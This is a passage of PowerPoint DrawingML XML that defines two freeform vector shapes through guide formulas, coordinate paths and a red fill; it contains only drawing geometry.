                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="13"/>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10" name="Freeform 91"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="413" y="2414"/>
                <a:ext cx="161" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 491"/>
                  <a:gd name="T1" fmla="*/ 0 h 151"/>
                  <a:gd name="T2" fmla="*/ 0 w 491"/>
                  <a:gd name="T3" fmla="*/ 0 h 151"/>
                  <a:gd name="T4" fmla="*/ 0 w 491"/>
                  <a:gd name="T5" fmla="*/ 0 h 151"/>
                  <a:gd name="T6" fmla="*/ 0 w 491"/>
                  <a:gd name="T7" fmla="*/ 0 h 151"/>
                  <a:gd name="T8" fmla="*/ 0 w 491"/>
                  <a:gd name="T9" fmla="*/ 0 h 151"/>
                  <a:gd name="T10" fmla="*/ 0 w 491"/>
                  <a:gd name="T11" fmla="*/ 0 h 151"/>
                  <a:gd name="T12" fmla="*/ 0 w 491"/>
                  <a:gd name="T13" fmla="*/ 0 h 151"/>
                  <a:gd name="T14" fmla="*/ 0 w 491"/>
                  <a:gd name="T15" fmla="*/ 0 h 151"/>
                  <a:gd name="T16" fmla="*/ 0 w 491"/>
                  <a:gd name="T17" fmla="*/ 0 h 151"/>
                  <a:gd name="T18" fmla="*/ 0 w 491"/>
                  <a:gd name="T19" fmla="*/ 0 h 151"/>
                  <a:gd name="T20" fmla="*/ 0 w 491"/>
                  <a:gd name="T21" fmla="*/ 0 h 151"/>
                  <a:gd name="T22" fmla="*/ 0 w 491"/>
                  <a:gd name="T23" fmla="*/ 0 h 151"/>
                  <a:gd name="T24" fmla="*/ 0 w 491"/>
                  <a:gd name="T25" fmla="*/ 0 h 151"/>
                  <a:gd name="T26" fmla="*/ 0 w 491"/>
                  <a:gd name="T27" fmla="*/ 0 h 151"/>
                  <a:gd name="T28" fmla="*/ 0 w 491"/>
                  <a:gd name="T29" fmla="*/ 0 h 151"/>
                  <a:gd name="T30" fmla="*/ 0 w 491"/>
                  <a:gd name="T31" fmla="*/ 0 h 151"/>
                  <a:gd name="T32" fmla="*/ 0 w 491"/>
                  <a:gd name="T33" fmla="*/ 0 h 151"/>
                  <a:gd name="T34" fmla="*/ 0 w 491"/>
                  <a:gd name="T35" fmla="*/ 0 h 151"/>
                  <a:gd name="T36" fmla="*/ 0 w 491"/>
                  <a:gd name="T37" fmla="*/ 0 h 151"/>
                  <a:gd name="T38" fmla="*/ 0 w 491"/>
                  <a:gd name="T39" fmla="*/ 0 h 151"/>
                  <a:gd name="T40" fmla="*/ 0 w 491"/>
                  <a:gd name="T41" fmla="*/ 0 h 151"/>
                  <a:gd name="T42" fmla="*/ 0 w 491"/>
                  <a:gd name="T43" fmla="*/ 0 h 151"/>
                  <a:gd name="T44" fmla="*/ 0 w 491"/>
                  <a:gd name="T45" fmla="*/ 0 h 151"/>
                  <a:gd name="T46" fmla="*/ 0 w 491"/>
                  <a:gd name="T47" fmla="*/ 0 h 151"/>
                  <a:gd name="T48" fmla="*/ 0 w 491"/>
                  <a:gd name="T49" fmla="*/ 0 h 151"/>
                  <a:gd name="T50" fmla="*/ 0 w 491"/>
                  <a:gd name="T51" fmla="*/ 0 h 151"/>
                  <a:gd name="T52" fmla="*/ 0 w 491"/>
                  <a:gd name="T53" fmla="*/ 0 h 151"/>
                  <a:gd name="T54" fmla="*/ 0 w 491"/>
                  <a:gd name="T55" fmla="*/ 0 h 151"/>
                  <a:gd name="T56" fmla="*/ 0 w 491"/>
                  <a:gd name="T57" fmla="*/ 0 h 151"/>
                  <a:gd name="T58" fmla="*/ 0 w 491"/>
                  <a:gd name="T59" fmla="*/ 0 h 151"/>
                  <a:gd name="T60" fmla="*/ 0 w 491"/>
                  <a:gd name="T61" fmla="*/ 0 h 151"/>
                  <a:gd name="T62" fmla="*/ 0 w 491"/>
                  <a:gd name="T63" fmla="*/ 0 h 151"/>
                  <a:gd name="T64" fmla="*/ 0 w 491"/>
                  <a:gd name="T65" fmla="*/ 0 h 151"/>
                  <a:gd name="T66" fmla="*/ 0 w 491"/>
                  <a:gd name="T67" fmla="*/ 0 h 151"/>
                  <a:gd name="T68" fmla="*/ 0 w 491"/>
                  <a:gd name="T69" fmla="*/ 0 h 151"/>
                  <a:gd name="T70" fmla="*/ 0 w 491"/>
                  <a:gd name="T71" fmla="*/ 0 h 151"/>
                  <a:gd name="T72" fmla="*/ 0 w 491"/>
                  <a:gd name="T73" fmla="*/ 0 h 151"/>
                  <a:gd name="T74" fmla="*/ 0 w 491"/>
                  <a:gd name="T75" fmla="*/ 0 h 151"/>
                  <a:gd name="T76" fmla="*/ 0 w 491"/>
                  <a:gd name="T77" fmla="*/ 0 h 151"/>
                  <a:gd name="T78" fmla="*/ 0 w 491"/>
                  <a:gd name="T79" fmla="*/ 0 h 151"/>
                  <a:gd name="T80" fmla="*/ 0 w 491"/>
                  <a:gd name="T81" fmla="*/ 0 h 151"/>
                  <a:gd name="T82" fmla="*/ 0 w 491"/>
                  <a:gd name="T83" fmla="*/ 0 h 151"/>
                  <a:gd name="T84" fmla="*/ 0 w 491"/>
                  <a:gd name="T85" fmla="*/ 0 h 151"/>
                  <a:gd name="T86" fmla="*/ 0 w 491"/>
                  <a:gd name="T87" fmla="*/ 0 h 151"/>
                  <a:gd name="T88" fmla="*/ 0 w 491"/>
                  <a:gd name="T89" fmla="*/ 0 h 151"/>
                  <a:gd name="T90" fmla="*/ 0 w 491"/>
                  <a:gd name="T91" fmla="*/ 0 h 151"/>
                  <a:gd name="T92" fmla="*/ 0 w 491"/>
                  <a:gd name="T93" fmla="*/ 0 h 151"/>
                  <a:gd name="T94" fmla="*/ 0 w 491"/>
                  <a:gd name="T95" fmla="*/ 0 h 151"/>
                  <a:gd name="T96" fmla="*/ 0 w 491"/>
                  <a:gd name="T97" fmla="*/ 0 h 151"/>
                  <a:gd name="T98" fmla="*/ 0 w 491"/>
                  <a:gd name="T99" fmla="*/ 0 h 151"/>
                  <a:gd name="T100" fmla="*/ 0 w 491"/>
                  <a:gd name="T101" fmla="*/ 0 h 151"/>
                  <a:gd name="T102" fmla="*/ 0 w 491"/>
                  <a:gd name="T103" fmla="*/ 0 h 151"/>
                  <a:gd name="T104" fmla="*/ 0 w 491"/>
                  <a:gd name="T105" fmla="*/ 0 h 151"/>
                  <a:gd name="T106" fmla="*/ 0 w 491"/>
                  <a:gd name="T107" fmla="*/ 0 h 151"/>
                  <a:gd name="T108" fmla="*/ 0 w 491"/>
                  <a:gd name="T109" fmla="*/ 0 h 15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1"/>
                  <a:gd name="T166" fmla="*/ 0 h 151"/>
                  <a:gd name="T167" fmla="*/ 491 w 491"/>
                  <a:gd name="T168" fmla="*/ 151 h 15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1" h="151">
                    <a:moveTo>
                      <a:pt x="158" y="18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="164" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="18"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="CC0A2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11" name="Freeform 92"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="418" y="2417"/>
                <a:ext cx="61" cy="41"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 189"/>
                  <a:gd name="T1" fmla="*/ 0 h 125"/>
                  <a:gd name="T2" fmla="*/ 0 w 189"/>
                  <a:gd name="T3" fmla="*/ 0 h 125"/>
                  <a:gd name="T4" fmla="*/ 0 w 189"/>
                  <a:gd name="T5" fmla="*/ 0 h 125"/>
                  <a:gd name="T6" fmla="*/ 0 w 189"/>
                  <a:gd name="T7" fmla="*/ 0 h 125"/>
                  <a:gd name="T8" fmla="*/ 0 w 189"/>
                  <a:gd name="T9" fmla="*/ 0 h 125"/>
                  <a:gd name="T10" fmla="*/ 0 w 189"/>
                  <a:gd name="T11" fmla="*/ 0 h 125"/>
                  <a:gd name="T12" fmla="*/ 0 w 189"/>
                  <a:gd name="T13" fmla="*/ 0 h 125"/>
                  <a:gd name="T14" fmla="*/ 0 w 189"/>
                  <a:gd name="T15" fmla="*/ 0 h 125"/>
                  <a:gd name="T16" fmla="*/ 0 w 189"/>
                  <a:gd name="T17" fmla="*/ 0 h 125"/>
                  <a:gd name="T18" fmla="*/ 0 w 189"/>
                  <a:gd name="T19" fmla="*/ 0 h 125"/>
                  <a:gd name="T20" fmla="*/ 0 w 189"/>
                  <a:gd name="T21" fmla="*/ 0 h 125"/>
                  <a:gd name="T22" fmla="*/ 0 w 189"/>
                  <a:gd name="T23" fmla="*/ 0 h 125"/>
                  <a:gd name="T24" fmla="*/ 0 w 189"/>
                  <a:gd name="T25" fmla="*/ 0 h 125"/>
                  <a:gd name="T26" fmla="*/ 0 w 189"/>
                  <a:gd name="T27" fmla="*/ 0 h 125"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 0 h 125"/>
                  <a:gd name="T30" fmla="*/ 0 w 189"/>
                  <a:gd name="T31" fmla="*/ 0 h 125"/>
                  <a:gd name="T32" fmla="*/ 0 w 189"/>
                  <a:gd name="T33" fmla="*/ 0 h 125"/>
                  <a:gd name="T34" fmla="*/ 0 w 189"/>
                  <a:gd name="T35" fmla="*/ 0 h 125"/>
                  <a:gd name="T36" fmla="*/ 0 w 189"/>
                  <a:gd name="T37" fmla="*/ 0 h 125"/>
                  <a:gd name="T38" fmla="*/ 0 w 189"/>
                  <a:gd name="T39" fmla="*/ 0 h 125"/>
                  <a:gd name="T40" fmla="*/ 0 w 189"/>
                  <a:gd name="T41" fmla="*/ 0 h 125"/>
                  <a:gd name="T42" fmla="*/ 0 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 125"/>
                  <a:gd name="T44" fmla="*/ 0 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 125"/>
                  <a:gd name="T46" fmla="*/ 0 w 189"/>
                  <a:gd name="T47" fmla="*/ 0 h 125"/>
                  <a:gd name="T48" fmla="*/ 0 w 189"/>
                  <a:gd name="T49" fmla="*/ 0 h 125"/>
                  <a:gd name="T50" fmla="*/ 0 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 125"/>
                  <a:gd name="T52" fmla="*/ 0 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 125"/>
                  <a:gd name="T54" fmla="*/ 0 w 189"/>
                  <a:gd name="T55" fmla="*/ 0 h 125"/>
                  <a:gd name="T56" fmla="*/ 0 w 189"/>
                  <a:gd name="T57" fmla="*/ 0 h 125"/>
                  <a:gd name="T58" fmla="*/ 0 w 189"/>
                  <a:gd name="T59" fmla="*/ 0 h 125"/>
                  <a:gd name="T60" fmla="*/ 0 w 189"/>
                  <a:gd name="T61" fmla="*/ 0 h 125"/>
                  <a:gd name="T62" fmla="*/ 0 w 189"/>
                  <a:gd name="T63" fmla="*/ 0 h 125"/>
                  <a:gd name="T64" fmla="*/ 0 w 189"/>
                  <a:gd name="T65" fmla="*/ 0 h 125"/>
                  <a:gd name="T66" fmla="*/ 0 w 189"/>
                  <a:gd name="T67" fmla="*/ 0 h 125"/>
                  <a:gd name="T68" fmla="*/ 0 w 189"/>
                  <a:gd name="T69" fmla="*/ 0 h 125"/>
                  <a:gd name="T70" fmla="*/ 0 w 189"/>
                  <a:gd name="T71" fmla="*/ 0 h 125"/>
                  <a:gd name="T72" fmla="*/ 0 w 189"/>
                  <a:gd name="T73" fmla="*/ 0 h 125"/>
                  <a:gd name="T74" fmla="*/ 0 w 189"/>
                  <a:gd name="T75" fmla="*/ 0 h 125"/>
                  <a:gd name="T76" fmla="*/ 0 w 189"/>
                  <a:gd name="T77" fmla="*/ 0 h 125"/>
                  <a:gd name="T78" fmla="*/ 0 w 189"/>
                  <a:gd name="T79" fmla="*/ 0 h 125"/>
                  <a:gd name="T80" fmla="*/ 0 w 189"/>
                  <a:gd name="T81" fmla="*/ 0 h 125"/>
                  <a:gd name="T82" fmla="*/ 0 w 189"/>
                  <a:gd name="T83" fmla="*/ 0 h 125"/>
                  <a:gd name="T84" fmla="*/ 0 w 189"/>
                  <a:gd name="T85" fmla="*/ 0 h 125"/>
                  <a:gd name="T86" fmla="*/ 0 w 189"/>
                  <a:gd name="T87" fmla="*/ 0 h 125"/>
                  <a:gd name="T88" fmla="*/ 0 w 189"/>
                  <a:gd name="T89" fmla="*/ 0 h 125"/>
                  <a:gd name="T90" fmla="*/ 0 w 189"/>
                  <a:gd name="T91" fmla="*/ 0 h 125"/>
                  <a:gd name="T92" fmla="*/ 0 w 189"/>
                  <a:gd name="T93" fmla="*/ 0 h 125"/>
                  <a:gd name="T94" fmla="*/ 0 w 189"/>
                  <a:gd name="T95" fmla="*/ 0 h 125"/>
                  <a:gd name="T96" fmla="*/ 0 w 189"/>
                  <a:gd name="T97" fmla="*/ 0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9"/>
                  <a:gd name="T148" fmla="*/ 0 h 125"/>
                  <a:gd name="T149" fmla="*/ 189 w 189"/>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9" h="125">
                    <a:moveTo>
                      <a:pt x="189" y="93"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="88"/>
